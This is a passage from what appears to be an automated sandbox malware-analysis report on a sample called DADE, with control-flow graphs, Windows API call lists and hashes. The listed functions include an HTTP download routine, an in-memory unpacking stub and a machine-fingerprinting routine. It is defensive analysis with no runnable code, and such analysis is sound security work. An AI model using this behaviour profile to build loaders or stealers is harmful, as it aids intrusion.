                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$lstrlen
                                                      • String ID: ------$"$--$------$~A
                                                      • API String ID: 367037083-2106860866
                                                      • Opcode ID: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
                                                      • Instruction ID: 212b4b6a8a6c145a7523e110c63bb65051ea1ed7585ae654da97c7ff09dcb277
                                                      • Opcode Fuzzy Hash: 3ae760454baa2433a10e4dfb7c9e6bd38ce3ae5d14960ce0b0a08ccdc03736b0
                                                      • Instruction Fuzzy Hash: 20426A71E006199BCB10EBB5DD89A9F77B5AF04304F44502AF905B72A1DB78ED028FE8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2223 418d00-418d24 StrCmpCA 2224 418d26-418d27 ExitProcess 2223->2224 2225 418d2d-418d46 strtok_s 2223->2225 2226 418f42-418f4f call 402930 2225->2226 2227 418d4c-418d51 2225->2227 2229 418d56-418d59 2227->2229 2230 418f23-418f3c strtok_s 2229->2230 2231 418d5f 2229->2231 2230->2226 2246 418d53 2230->2246 2233 418de4-418df2 StrCmpCA 2231->2233 2234 418e04-418e18 StrCmpCA 2231->2234 2235 418d66-418d75 lstrlenA 2231->2235 2236 418ee8-418efa lstrlenA 2231->2236 2237 418ecf-418edd StrCmpCA 2231->2237 2238 418d90-418d9f lstrlenA 2231->2238 2239 418eb6-418ec4 StrCmpCA 2231->2239 2240 418dba-418dc9 lstrlenA 2231->2240 2241 418e1d-418e2b StrCmpCA 2231->2241 2242 418e3d-418e4b StrCmpCA 2231->2242 2243 418e5d-418e6b StrCmpCA 2231->2243 2244 418e7d-418e8b StrCmpCA 2231->2244 2245 418e9d-418eab StrCmpCA 2231->2245 2233->2230 2259 418df8-418dff 2233->2259 2234->2230 2248 418d77-418d7c call 402930 2235->2248 2249 418d7f-418d8b call 402840 2235->2249 2253 418f04-418f10 call 402840 2236->2253 2254 418efc-418f01 call 402930 2236->2254 2237->2230 2252 418edf-418ee6 2237->2252 2255 418da1-418da6 call 402930 2238->2255 2256 418da9-418db5 call 402840 2238->2256 2239->2230 2251 418ec6-418ecd 2239->2251 2257 418dd3-418ddf call 402840 2240->2257 2258 418dcb-418dd0 call 402930 2240->2258 2241->2230 2260 418e31-418e38 2241->2260 2242->2230 2261 418e51-418e58 2242->2261 2243->2230 2262 418e71-418e78 2243->2262 2244->2230 2247 418e91-418e98 2244->2247 2245->2230 2250 418ead-418eb4 2245->2250 2246->2229 2247->2230 2248->2249 2279 418f13-418f15 2249->2279 2250->2230 2251->2230 2252->2230 2253->2279 2254->2253 2255->2256 2256->2279 2257->2279 2258->2257 2259->2230 2260->2230 2261->2230 2262->2230 2279->2230 2280 418f17-418f19 2279->2280 2280->2230 2281 418f1b-418f1d lstrcpy 2280->2281 2281->2230
                                                      APIs
                                                      • StrCmpCA.SHLWAPI(?,block,?,?,?,?,0042081F), ref: 00418D1A
                                                      • ExitProcess.KERNEL32 ref: 00418D27
                                                      • strtok_s.MSVCRT ref: 00418D39
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcessstrtok_s
                                                      • String ID: block
                                                      • API String ID: 3407564107-2199623458
                                                      • Opcode ID: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                      • Instruction ID: d61f0b7eaf725463d85374e156b8a22592a45d2bf89fa87c178f2814d4d341aa
                                                      • Opcode Fuzzy Hash: 2b5693eeba8fd220ac83beb12232b21ebf595c586142cf98576af706eac3d5ba
                                                      • Instruction Fuzzy Hash: 675160B1A047019FC7209F75EC88AAB77F6EB48704B10582FE452D7660DBBCD4828F69

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2282 406b80-406ba4 call 402840 2285 406bb5-406bd7 call 404ae0 2282->2285 2286 406ba6-406bab 2282->2286 2290 406bd9 2285->2290 2291 406bea-406bfa call 402840 2285->2291 2286->2285 2287 406bad-406baf lstrcpy 2286->2287 2287->2285 2292 406be0-406be8 2290->2292 2295 406c08-406c35 InternetOpenA StrCmpCA 2291->2295 2296 406bfc-406c02 lstrcpy 2291->2296 2292->2291 2292->2292 2297 406c37 2295->2297 2298 406c3a-406c3c 2295->2298 2296->2295 2297->2298 2299 406c42-406c62 InternetConnectA 2298->2299 2300 406de8-406dfb call 402840 2298->2300 2301 406de1-406de2 InternetCloseHandle 2299->2301 2302 406c68-406c9d HttpOpenRequestA 2299->2302 2309 406e09-406e20 call 402930 * 2 2300->2309 2310 406dfd-406dff 2300->2310 2301->2300 2304 406ca3-406ca5 2302->2304 2305 406dd4-406dde InternetCloseHandle 2302->2305 2307 406ca7-406cb7 InternetSetOptionA 2304->2307 2308 406cbd-406ced HttpSendRequestA HttpQueryInfoA 2304->2308 2305->2301 2307->2308 2311 406d14-406d24 call 423d30 2308->2311 2312 406cef-406d13 call 427210 call 402930 * 2 2308->2312 2310->2309 2313 406e01-406e03 lstrcpy 2310->2313 2311->2312 2321 406d26-406d28 2311->2321 2313->2309 2324 406dcd-406dce InternetCloseHandle 2321->2324 2325 406d2e-406d47 InternetReadFile 2321->2325 2324->2305 2325->2324 2327 406d4d 2325->2327 2329 406d50-406d55 2327->2329 2329->2324 2331 406d57-406d7d call 427340 2329->2331 2334 406d84-406d91 call 402840 2331->2334 2335 406d7f call 402930 2331->2335 2339 406da1-406dcb call 402930 InternetReadFile 2334->2339 2340 406d93-406d97 2334->2340 2335->2334 2339->2324 2339->2329 2340->2339 2342 406d99-406d9b lstrcpy 2340->2342 2342->2339
                                                      APIs
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406BAF
                                                      • lstrcpy.KERNEL32(00000000,0042D01C), ref: 00406C02
                                                      • InternetOpenA.WININET(0042D01C,00000001,00000000,00000000,00000000), ref: 00406C15
                                                      • StrCmpCA.SHLWAPI(?,00A7FF78), ref: 00406C2D
                                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406C55
                                                      • HttpOpenRequestA.WININET(00000000,GET,?,00A7F838,00000000,00000000,-00400100,00000000), ref: 00406C90
                                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406CB7
                                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406CC6
                                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406CE5
                                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00406D3F
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 00406D9B
                                                      • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00406DBD
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406DCE
                                                      • InternetCloseHandle.WININET(?), ref: 00406DD8
                                                      • InternetCloseHandle.WININET(00000000), ref: 00406DE2
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00406E03
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                                                      • String ID: ERROR$GET
                                                      • API String ID: 3687753495-3591763792
                                                      • Opcode ID: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
                                                      • Instruction ID: f53a93b1956779abd9a8e71fe9530673e78fc1538c85e26cedc949aa3c7bae39
                                                      • Opcode Fuzzy Hash: d4dda7033de1c3ef4f9815039b5a93dc3c9111a47bd79444559f63d6606b1acc
                                                      • Instruction Fuzzy Hash: C1818071B00215ABEB20DFA4DC49BAF77B9AF44700F114169F905F72D0DBB8AD058BA8

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2344 9d003c-9d0047 2345 9d004c-9d0263 call 9d0a3f call 9d0e0f call 9d0d90 VirtualAlloc 2344->2345 2346 9d0049 2344->2346 2361 9d028b-9d0292 2345->2361 2362 9d0265-9d0289 call 9d0a69 2345->2362 2346->2345 2364 9d02a1-9d02b0 2361->2364 2366 9d02ce-9d03c2 VirtualProtect call 9d0cce call 9d0ce7 2362->2366 2364->2366 2367 9d02b2-9d02cc 2364->2367 2373 9d03d1-9d03e0 2366->2373 2367->2364 2374 9d0439-9d04b8 VirtualFree 2373->2374 2375 9d03e2-9d0437 call 9d0ce7 2373->2375 2377 9d04be-9d04cd 2374->2377 2378 9d05f4-9d05fe 2374->2378 2375->2373 2380 9d04d3-9d04dd 2377->2380 2381 9d077f-9d0789 2378->2381 2382 9d0604-9d060d 2378->2382 2380->2378 2386 9d04e3-9d0505 LoadLibraryA 2380->2386 2384 9d078b-9d07a3 2381->2384 2385 9d07a6-9d07b0 2381->2385 2382->2381 2387 9d0613-9d0637 2382->2387 2384->2385 2388 9d086e-9d08be LoadLibraryA 2385->2388 2389 9d07b6-9d07cb 2385->2389 2390 9d0517-9d0520 2386->2390 2391 9d0507-9d0515 2386->2391 2392 9d063e-9d0648 2387->2392 2396 9d08c7-9d08f9 2388->2396 2393 9d07d2-9d07d5 2389->2393 2394 9d0526-9d0547 2390->2394 2391->2394 2392->2381 2395 9d064e-9d065a 2392->2395 2397 9d0824-9d0833 2393->2397 2398 9d07d7-9d07e0 2393->2398 2399 9d054d-9d0550 2394->2399 2395->2381 2400 9d0660-9d066a 2395->2400 2401 9d08fb-9d0901 2396->2401 2402 9d0902-9d091d 2396->2402 2408 9d0839-9d083c 2397->2408 2403 9d07e4-9d0822 2398->2403 2404 9d07e2 2398->2404 2405 9d0556-9d056b 2399->2405 2406 9d05e0-9d05ef 2399->2406 2407 9d067a-9d0689 2400->2407 2401->2402 2403->2393 2404->2397 2409 9d056d 2405->2409 2410 9d056f-9d057a 2405->2410 2406->2380 2411 9d068f-9d06b2 2407->2411 2412 9d0750-9d077a 2407->2412 2408->2388 2413 9d083e-9d0847 2408->2413 2409->2406 2415 9d057c-9d0599 2410->2415 2416 9d059b-9d05bb 2410->2416 2417 9d06ef-9d06fc 2411->2417 2418 9d06b4-9d06ed 2411->2418 2412->2392 2419 9d0849 2413->2419 2420 9d084b-9d086c 2413->2420 2427 9d05bd-9d05db 2415->2427 2416->2427 2421 9d06fe-9d0748 2417->2421 2422 9d074b 2417->2422 2418->2417 2419->2388 2420->2408 2421->2422 2422->2407 2427->2399
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 009D024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: 5c36b97fbd7eb516f5c5aebb53495624ec53899763a9feb03dc5b99fe81f7268
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: B9526974A012299FDB64CF58C984BA8BBB1BF49304F1480DAE94DAB351DB30AE85DF14

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2428 4226e0-422723 GetWindowsDirectoryA 2429 422725 2428->2429 2430 42272c-42278a GetVolumeInformationA 2428->2430 2429->2430 2431 42278c-422792 2430->2431 2432 422794-4227a7 2431->2432 2433 4227a9-4227c0 GetProcessHeap HeapAlloc 2431->2433 2432->2431 2434 4227c2-4227c4 2433->2434 2435 4227c6-4227e4 wsprintfA 2433->2435 2436 4227fb-422812 call 427210 2434->2436 2435->2436
                                                      APIs
                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104,?,00A769B0), ref: 0042271B
                                                      • GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,0042A470,00000000,00000000,00000000,00000000,?,00A769B0), ref: 0042274C
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,?,00A769B0), ref: 004227AF
                                                      • HeapAlloc.KERNEL32(00000000,?,00A769B0), ref: 004227B6
                                                      • wsprintfA.USER32 ref: 004227DB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocDirectoryInformationProcessVolumeWindowswsprintf
                                                      • String ID: :\$C
                                                      • API String ID: 1325379522-3309953409
                                                      • Opcode ID: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                      • Instruction ID: 1140a15a3936c49260c842706b5d3ee9313ab901dfb0a5368262f5a6e36a0845
                                                      • Opcode Fuzzy Hash: 17ae3cac4a1021ad5abd00249c5e84745470b2baf85fda495f1cbf63d3468fe6
                                                      • Instruction Fuzzy Hash: D63181B1908219AFCB14CFB89A859EFBFB8FF58740F40016EE505E7250E2748A008BB5

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2439 405570-4055cf GetProcessHeap RtlAllocateHeap InternetOpenA InternetOpenUrlA 2440 4055d1-4055d2 2439->2440 2441 405627-40563d InternetCloseHandle * 2 2439->2441 2442 4055d8-4055f7 InternetReadFile 2440->2442 2443 4056a7-4056b1 2441->2443 2444 40563f-40564d 2441->2444 2445 405623-405626 2442->2445 2446 4055f9 2442->2446 2447 405677-40567c 2444->2447 2448 40564f-405652 2444->2448 2445->2441 2450 405600-40561d KiUserExceptionDispatcher 2446->2450 2447->2443 2449 40567e-405681 2447->2449 2448->2447 2451 405654-40565a 2448->2451 2449->2443 2452 405683-405689 2449->2452 2450->2450 2453 40561f-405621 2450->2453 2454 405661-405672 2451->2454 2455 40565c 2451->2455 2457 405691-4056a2 2452->2457 2458 40568b 2452->2458 2453->2442 2453->2445 2454->2447 2456 405674 2454->2456 2455->2454 2456->2447 2457->2443 2459 4056a4 2457->2459 2458->2457 2459->2443
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00405589
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00405590
                                                      • InternetOpenA.WININET(0042D01C,00000000,00000000,00000000,00000000), ref: 004055A6
                                                      • InternetOpenUrlA.WININET(00000000,?,00000000,00000000,04000100,00000000), ref: 004055C1
                                                      • InternetReadFile.WININET(?,?,00000400,00000001), ref: 004055EC
                                                      • KiUserExceptionDispatcher.NTDLL(00000000,?,00000001), ref: 00405611
                                                      • InternetCloseHandle.WININET(?), ref: 0040562B
                                                      • InternetCloseHandle.WININET(00000000), ref: 00405632
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Internet$CloseHandleHeapOpen$AllocateDispatcherExceptionFileProcessReadUser
                                                      • String ID:
                                                      • API String ID: 1337183907-0
                                                      • Opcode ID: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                      • Instruction ID: 854f5e81363ebd755ef7060f84f674ff8e42ebe29511b49783b395d7a9db8b06
                                                      • Opcode Fuzzy Hash: 4b94f128dec9b096c0b0ad2455cc516de48ee45f6034d2c2602a7e5d6cf19bdb
                                                      • Instruction Fuzzy Hash: EA416C70A00605AFDB24CF55DC48FABB7B5FF48304F5484AAE909AB390D7B69941CF98

                                                      Control-flow Graph

                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AddressProc
                                                      • String ID:
                                                      • API String ID: 190572456-0
                                                      • Opcode ID: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                      • Instruction ID: cac6e6cf4f72435ab544ab5d58b10c7d6a3df40e2c9cfd7f484d5f34573f69b4
                                                      • Opcode Fuzzy Hash: a84b951d2b664242528f7cdbc79ceee9a28f995f159ad1c2a93245ee24929f84
                                                      • Instruction Fuzzy Hash: 08315335B006169BCB20BF76DD8579F76A66F00744B44413BB901E72B1DF78ED058B98

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 2512 404ae0-404aee 2513 404af0-404af5 2512->2513 2513->2513 2514 404af7-404b68 ??2@YAPAXI@Z * 3 lstrlenA InternetCrackUrlA call 402930 2513->2514
                                                      APIs
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800,00A76950), ref: 00404B17
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B21
                                                      • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404B2B
                                                      • lstrlenA.KERNEL32(?,00000000,?), ref: 00404B3F
                                                      • InternetCrackUrlA.WININET(?,00000000), ref: 00404B47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
